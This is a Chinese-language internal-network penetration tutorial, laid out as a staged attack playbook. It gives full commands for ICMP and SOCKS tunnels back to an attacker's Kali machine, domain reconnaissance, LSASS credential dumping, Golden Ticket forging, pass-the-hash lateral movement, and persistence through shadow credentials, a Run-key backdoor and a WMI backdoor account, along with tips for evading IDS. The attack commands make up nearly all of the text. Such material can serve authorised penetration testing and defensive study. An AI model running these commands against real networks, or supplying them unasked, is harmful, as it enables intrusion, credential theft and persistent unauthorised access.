第一阶段:隧道与代理(内网渗透的 “高速公路”)
在内网中,你经常遇到的情况是:你只能控制一台 Web 服务器,但它身后有 10.10.10.x/24 的核心网段。你的 Kali 无法直接访问内网 IP,必须通过 Web 服务器(跳板)进行转发。
1. 隐蔽隧道:ICMP (Ping Tunnel)
场景:防火墙封禁了 TCP/UDP 出站,但允许 Ping (ICMP)。工具:icmptunnel(Kali 默认未安装,需自行下载编译或使用现成脚本)。
- Kali (服务端):
bash
运行
# 开启 IP 转发 echo 1 > /proc/sys/net/ipv4/ip_forward # 允许非 root 用户 Ping sysctl -w net.ipv4.ping_group_range="0 2147483647" # 启动服务端 ./icmptunnel -s # 设置虚拟网卡 IP ifconfig tun0 10.10.10.1 netmask 255.255.255.0 - 跳板机 (Windows):上传
icmptunnel.exe。cmd
icmptunnel.exe -c <Kali公网IP> # 在跳板机上设置路由,将内网流量指向隧道 route add 10.10.10.0 mask 255.255.255.0 10.10.10.2
2. 多重跳板:EarthWorm (EW) 与 Socks 代理
场景:目标内网有多层(A -> B -> C),你需要穿透多层才能到达核心。工具:ew_for_linux64/ew_for_Win.exe
- Kali (监听端):
bash
运行
./ew -s rcsocks -l 1080 -e 8888 - 第一层跳板 (A 机):
cmd
ew -s rssocks -d <KaliIP> -e 8888 - 第二层跳板 (B 机):
cmd
ew -s lcx_slave -d <A机IP> -e 8888 -f <B机IP> -g 9999 - 核心机 (C 机):
cmd
ew -s lcx_listen -l 9999 -e 1080 - 最终连接:配置
/etc/proxychains4.conf指向127.0.0.1:1080,即可直接访问 C 机内网。
第二阶段:域内信息收集(绘制 “藏宝图”)
拿到域内一台机器权限后,不要急着扫描,先进行被动侦察。
1. 极速资产探测:CrackMapExec (CME)
这是内网渗透的 “瑞士军刀”,必须熟练掌握。
- 探测存活主机与 SMB 签名状态:
bash
运行
proxychains crackmapexec smb 192.168.1.0/24 - 导出所有域用户列表 (需低权限账号):
bash
运行
proxychains crackmapexec ldap <DC_IP> -u 'user' -p 'pass' --users - 寻找未打补丁的机器 (如 MS17-010):
bash
运行
proxychains crackmapexec smb 192.168.1.0/24 -u '' -p '' --scripts smb-vuln-ms17-010
2. 黄金票据与白银票据:Mimikatz
在内网横向移动中,抓取 Hash 是基础,但票据传递更隐蔽。
- 抓取 LSASS 内存 (获取 Hash):在 Meterpreter 中:
meterpreter
load kiwi creds_all # 或者直接迁移进程后 migrate -N lsass.exe hashdump - 制作黄金票据 (Golden Ticket):前提:已获取krbtgt账号的 Hash 和Domain SID。
cmd
(此时你已拥有域管理员权限,可直接访问任意机器)mimikatz "kerberos::golden /domain:test.local /sid:S-1-5-21-xxxx /rc4:<krbtgt_hash> /user:Administrator /ptt" exit
第三阶段:横向移动(渗透的 “闪电战”)
1. 哈希传递 (PTH) - 不需要密码明文
- 利用 Impacket 的 psexec.py:
bash
运行
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes <LM_hash>:<NTLM_hash> Administrator@192.168.1.105 - 利用 CrackMapExec 执行命令:
bash
运行
proxychains crackmapexec smb 192.168.1.105 -u Administrator -H <NTLM_hash> -x "whoami"
2. WMI 横向移动 (无文件落地)
场景:目标关闭了 445 端口 (SMB),但开启了 135 (WMI)。工具:wmiexec.py
bash
运行
proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes :<NTLM_hash> Administrator@192.168.1.106 "ipconfig"3. WinRM (PowerShell 远程)
场景:目标开启了 WinRM (5985/5986),这是横向移动的 “快车道”。工具:evil-winrm
bash
运行
proxychains evil-winrm -i 192.168.1.107 -u Administrator -H <NTLM_hash>第四阶段:权限维持(种 “不死鸟” 后门)
拿下域控后,如何确保下次还能进来?
1. 隐蔽账号 (Shadow Credentials)
原理:利用 AD CS (证书服务) 为域管账号添加一个备用的 Key Credential,无需修改密码。工具:Whisker.exe
- 添加影子凭据:
cmd
Whisker.exe add /target:Administrator - 利用影子凭据登录 (Rubeus):
cmd
Rubeus.exe asktgt /user:Administrator /certificate:<Base64_Cert> /password:<Cert_Password> /getcredentials
2. 注册表后门 (Registry Persistence)
场景:目标是工作组机器,无杀毒软件。操作:
cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v UpdateService /t REG_SZ /d "C:\backdoor.exe" /f3. WMI 事件订阅后门
场景:非常隐蔽,几乎不落地文件。工具:WMIBackdoor.ps1
powershell
Import-Module .\WMIBackdoor.ps1 Set-WmiBackdoor -User "backdoor" -Password "P@ssw0rd"第五阶段:Kali 内网排错与流量控制
在内网渗透中,**“网络不通”** 是最大的敌人。
1. 流量转发排查
如果发现代理不通,使用tcpdump在 Kali 上抓包:
bash
运行
tcpdump -i tun0 port 1080 -n检查是否有数据包进来。如果有进无出,检查ip_forward:
bash
运行
sysctl net.ipv4.ip_forward2. 规避 IPS/IDS
- 修改扫描速度:Nmap 扫描过快会被拉黑。
bash
运行
proxychains nmap -sT -Pn -p- --scan-delay 1s 192.168.1.100 - 使用静态二进制文件:在跳板机上,尽量使用静态编译的工具(如
static-nmap,static-nc),避免依赖库缺失问题。
附录:必备工具包清单 (建议下载并打包)
在实战中,你需要将这些工具上传到跳板机:
- 信息收集:
SharpHound.exe(BloodHound),PowerView.ps1 - 凭证提取:
mimikatz.exe,Procdump.exe,LaZagne.exe - 隧道工具:
frp,nps,reGeorg,EarthWorm - 横向移动:
CrackMapExec(Linux/Win 版),PsExec.exe,PAExec.exe(PsExec 的无 DLL 版本)
